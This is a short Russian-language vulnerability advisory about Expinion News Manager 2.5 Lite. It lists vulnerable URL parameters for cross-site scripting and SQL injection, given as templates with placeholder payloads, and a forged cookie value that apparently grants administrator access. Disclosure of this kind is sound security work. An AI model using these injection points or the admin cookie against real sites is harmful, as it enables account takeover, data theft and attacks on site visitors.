Программа: Expinion News Manager 2.5 

Несколько уязвимостей обнаружено в Expinion News Manager Lite. Удаленный пользователь может внедриться в административную учетную запись, внедрить SQL команды и выполнить XSS нападение:

1. XSS 

http://[host]/comment_add.asp?ID=3&email=[XSS]
http://[host]/search.asp?search=[XSS]
http://[host]/cat egory_news_headline.asp?ID=2&n=[XSS]

2. SQL injection 

http://[host]/more.asp?ID='[SQL query]
http://[host]/category_news.asp?ID='[SQL]
http://[host]/news_sort.asp?filter='[SQL]

3. Административный доступ: 

Cookie: NEWS%5FLOGIN=ADMIN=1&ID=1

Оставить мнение